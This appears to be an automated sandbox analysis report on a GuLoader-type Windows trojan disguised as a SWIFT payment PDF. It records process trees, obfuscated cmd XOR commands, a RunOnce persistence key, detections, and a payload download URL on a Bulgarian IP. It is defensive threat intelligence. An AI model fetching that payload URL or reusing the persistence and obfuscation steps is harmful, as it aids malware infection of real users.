          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 1092
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe "C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe"
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe "C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeCode function: 6_2_00405B99 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,6_2_00405B99
MITRE ATT&CK Matrix (techniques listed per tactic; a number in front of a technique is the count shown in the matrix for that technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: 1 Command and Scripting Interpreter; 1 Native API; At; Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: 1 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: 11 Process Injection; 1 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: 11 Masquerading; 1 Virtualization/Sandbox Evasion; 11 Process Injection; 11 Deobfuscate/Decode Files or Information; 1 Time Based Evasion; 2 Obfuscated Files or Information; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: 111 Security Software Discovery; 1 Virtualization/Sandbox Evasion; 1 Time Based Evasion; 4 File and Directory Discovery; 3 System Information Discovery; Wi-Fi Discovery; Remote System Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: 1 Archive Collected Data; 1 Clipboard Data; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: 1 Encrypted Channel; 1 Ingress Tool Transfer; 1 Non-Application Layer Protocol; 11 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Behavior Graph ID: 1432107 | Sample: SWIFTCOPYMT1030000000_pdf.exe | Startdate: 26/04/2024 | Architecture: WINDOWS | Score: 96
Start node signatures: Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; Yara detected GuLoader; 4 other signatures
Process SWIFTCOPYMT1030000000_pdf.exe (4 registry values, 39 files), started from the start node
  Dropped: C:\Users\user\AppData\Local\...\nsExec.dll, PE32; C:\Users\user\AppData\Local\...\System.dll, PE32
  Signatures: Obfuscated command line found; Mass process execution to delay analysis
  Started: SWIFTCOPYMT1030000000_pdf.exe (1 registry value, 8 files); cmd.exe; cmd.exe; 62 other processes
Process SWIFTCOPYMT1030000000_pdf.exe (child)
  DNS/IP: 94.156.8.104, 50341, 80, NET1-ASBG, Bulgaria
  Dropped: C:\Users\user\AppData\...\Nonaddicting.exe, PE32
  Started: WerFault.exe
Each cmd.exe started Conhost.exe; the 62 other processes started Conhost.exe (three shown) and 59 other processes

Source | Detection | Scanner | Label
SWIFTCOPYMT1030000000_pdf.exe | 16% | ReversingLabs | Win32.Trojan.InjectorX
SWIFTCOPYMT1030000000_pdf.exe | 36% | Virustotal |
SWIFTCOPYMT1030000000_pdf.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\Drikkelse\Nonaddicting.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\Drikkelse\Nonaddicting.exe | 16% | ReversingLabs | Win32.Trojan.InjectorX
C:\Users\user\AppData\Local\Temp\Drikkelse\Nonaddicting.exe | 36% | Virustotal |
C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll | 1% | Virustotal |
C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\nsExec.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\nsExec.dll | 1% | Virustotal |
          No Antivirus matches
          No Antivirus matches
Source | Detection | Scanner | Label
http://94.156.8.104/yFtqL16.binApokOpt103.78.0.98/yFtqL16.bin | 0% | Avira URL Cloud | safe
http://94.156.8.104/yFtqL16.bin | 0% | Avira URL Cloud | safe
          No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://94.156.8.104/yFtqL16.bin | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nsis.sf.net/NSIS_Error | SWIFTCOPYMT1030000000_pdf.exe, SWIFTCOPYMT1030000000_pdf.exe, 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmp | false | | high
http://nsis.sf.net/NSIS_ErrorError | SWIFTCOPYMT1030000000_pdf.exe, 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmp, SWIFTCOPYMT1030000000_pdf.exe, 00000006.00000000.133684224870.0000000000409000.00000008.00000001.01000000.00000004.sdmp, SWIFTCOPYMT1030000000_pdf.exe, 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmp | false | | high
http://94.156.8.104/yFtqL16.binApokOpt103.78.0.98/yFtqL16.bin | SWIFTCOPYMT1030000000_pdf.exe, 00000088.00000002.134626594503.0000000009280000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
94.156.8.104 | unknown | Bulgaria | 43561 | NET1-ASBG | false
              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1432107
              Start date and time:2024-04-26 13:36:20 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 15m 33s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
              Run name:Suspected Instruction Hammering
Number of new started processes analysed:142
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:SWIFTCOPYMT1030000000_pdf.exe
              Detection:MAL
              Classification:mal96.troj.evad.winEXE@396/18@0/1
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 87%
              • Number of executed functions: 46
              • Number of non-executed functions: 62
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
              • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, RuntimeBroker.exe, backgroundTaskHost.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 52.182.143.212
              • Excluded domains from analysis (whitelisted): spclient.wg.spotify.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com
              • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed; the report is missing behavior information
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtWriteVirtualMemory calls found.
Time | Type | Description
12:39:19 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Blankbook C:\Users\user\AppData\Local\Temp\Drikkelse\Nonaddicting.exe
12:39:27 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Blankbook C:\Users\user\AppData\Local\Temp\Drikkelse\Nonaddicting.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
94.156.8.104 | PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe | malicious | GuLoader, Remcos | 94.156.8.104/yhHZZNqAePDSUakAFmHWn151.bin
              No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
NET1-ASBG | PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe | malicious | GuLoader, Remcos | 94.156.8.104
NET1-ASBG | DHL_ES567436735845755676678877988975877.vbs | malicious | FormBook, GuLoader, Remcos | 87.121.105.163
NET1-ASBG | xtnhsVjQTxvH.exe | malicious | Quasar | 94.156.79.26
NET1-ASBG | o4883TEQGB.elf | malicious | Gafgyt, Mirai | 94.156.8.9
NET1-ASBG | Id2uxwyyf8.elf | malicious | Gafgyt, Mirai | 94.156.8.9
NET1-ASBG | Y4pblBbDQc.elf | malicious | Gafgyt, Mirai | 94.156.8.9
NET1-ASBG | C5fMgX1ZyY.elf | malicious | Gafgyt, Mirai | 94.156.8.9
NET1-ASBG | 6fV4tfoJp2.elf | malicious | Gafgyt, Mirai | 94.156.8.9
NET1-ASBG | fqEpqMWF6r.elf | malicious | Gafgyt, Mirai | 94.156.8.9
NET1-ASBG | D0dhEeGfv4.elf | malicious | Gafgyt, Mirai | 94.156.8.9
              No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\nsExec.dll | PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe | malicious | GuLoader, Remcos
C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\nsExec.dll | PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe | malicious | GuLoader
C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll | PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe | malicious | GuLoader, Remcos
C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll | PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe | malicious | GuLoader
C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll | seDzEfSLFg.exe | malicious | GuLoader
C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll | seDzEfSLFg.exe | malicious | GuLoader
C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll | Sipari#U015f_#U00d6zellikleri.exe | malicious | Remcos, GuLoader
C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll | Sipari#U015f_#U00d6zellikleri.exe | malicious | GuLoader
C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll | Factura_0104109174pdf.exe | malicious | FormBook, GuLoader
C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll | Factura_0104109174pdf.exe | malicious | GuLoader
C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll | Transferencia.exe | malicious | FormBook, GuLoader
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):65536
                                    Entropy (8bit):1.007088769936823
                                    Encrypted:false
                                    SSDEEP:192:a2bgXx9emod9hKjYhvj2IDu76ffAIO83:IXr3od9hKjSDu76ffAIO83
                                    MD5:B4338B2F0CEFBEF9F598789C91B201CA
                                    SHA1:D5A0596BE6A009BC9DA13AF5DF79CE73BABAC543
                                    SHA-256:95AAA5190F0C73E3A06DAD1B066B2666D6AB7DC5B39C435F747076B16A363466
                                    SHA-512:0DD6630D2DE0B6802D697AFA6B94C54DAF8A13C95592D1CCD7DC0B340FB775FF3932C968D005B812AF8529D2301104A848F816AFCF98480300E71E825E6D3637
                                    Malicious:false
                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.6.0.5.1.6.2.1.0.5.2.9.6.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.6.0.5.1.6.2.4.6.4.5.8.4.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.7.d.e.1.e.b.3.-.8.4.3.6.-.4.6.1.9.-.8.d.f.8.-.e.a.2.a.a.d.8.a.2.1.e.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.9.1.1.0.e.2.b.-.5.c.e.c.-.4.3.9.7.-.b.a.a.c.-.9.f.c.0.c.7.5.b.3.8.1.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.W.I.F.T.C.O.P.Y.M.T.1.0.3.0.0.0.0.0.0.0._.p.d.f...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.4.f.4.-.0.0.0.1.-.0.0.2.7.-.1.c.4.4.-.8.0.5.8.c.e.9.7.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.2.8.9.4.a.9.2.1.2.9.d.4.7.9.9.d.4.d.5.7.e.b.5.1.c.e.2.6.d.c.3.0.0.0.0.0.9.0.4.!.0.0.0.0.8.a.3.3.7.0.d.0.1.a.1.7.0.6.2.6.e.f.4.3.2.0.2.f.5.f.e.5.4.e.2.7.3.7.2.a.b.e.c.4.!.S.W.I.F.T.C.O.P.Y.M.T.1.0.3.0.
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Mini DuMP crash report, 14 streams, Fri Apr 26 11:39:22 2024, 0x1205a4 type
                                    Category:dropped
                                    Size (bytes):89228
                                    Entropy (8bit):1.9852446809809239
                                    Encrypted:false
                                    SSDEEP:384:rlh7p+9QZFICttAG1LXIILMS3JeyugLERYLs8RBF6qkx:n7p+9Q3ICgG1DT15udRYLrnM/
                                    MD5:E34E1D319E034A895D1227CB365DA2CF
                                    SHA1:E613250454A839297CA68316A2894447DF496081
                                    SHA-256:A2C112A76D1E47530B0BC7B69BE56CC02BE8557776C9D3F06D6207C941FFAF5E
                                    SHA-512:4DE93FDE47A1DF4432CA5EB203B01C17A6BEF5539BBE7C8CD0005F0249B70FAFB0606DACEE74BB0500CE69826242A7B203DB7AAE2FDAE512D10E22AF8BD065DA
                                    Malicious:false
                                    Preview:MDMP..a..... .......j.+f........................................ZF..........T.......8...........T............0...,....................... ..............................................................................bJ......d!......GenuineIntel...........T...........Z.+f.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):8516
                                    Entropy (8bit):3.704002012904152
                                    Encrypted:false
                                    SSDEEP:192:R9l7lZNiwu6E6YMf6xgmfFbbmjpDG89bsEsfokm:R9lnNiB6E6Ys6xgmfFbys3f6
                                    MD5:F7D315440C68A94937FFF06A00F6D313
                                    SHA1:F70FFB0FC3D714F6A4D07A9D4A7518ED58E53228
                                    SHA-256:2F35E501EFD3DC66DF9222E52B28CBD209BA2B59854CDB6DF418DDEAA9C727BD
                                    SHA-512:FAE0E3AD9122A8A2FB4A1FCE9A39F78F794269C3802DAECBC46DFC732EABF2C9916C3082D655CC3F5292089DE5AC3FC386EB0F06EBB1991E2DEBB85AE9254253
                                    Malicious:false
                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.2.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...1.1.6.5...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.6.5.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.2.6.8.<./.P.i.
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):4939
                                    Entropy (8bit):4.54664521029274
                                    Encrypted:false
                                    SSDEEP:48:cvIwwtl8zs0e702I7VFJ5WS2CfjkDs3rm8M4Jq5CFLE+q8v95Nrdm683hd:uILfZ7GySPfHJAK15mp3hd
                                    MD5:DDA7A1B7B3D4D8A0679B33F39E8251A8
                                    SHA1:ADE3F42C1BE7A171D6FA32611B59217ACFAFB550
                                    SHA-256:7890169558DC3FEB77AE210A69AFA501EE9AF5C6D8A337CF9386B2768921C1D1
                                    SHA-512:969668C1AF980257960430BC587C734CF4F65A351186BD4A856AF6A17B73C8F292BC4727471B82B4969DDCF25A18CB8C8D613F01C0A8A98A2505B1383B2782BA
                                    Malicious:false
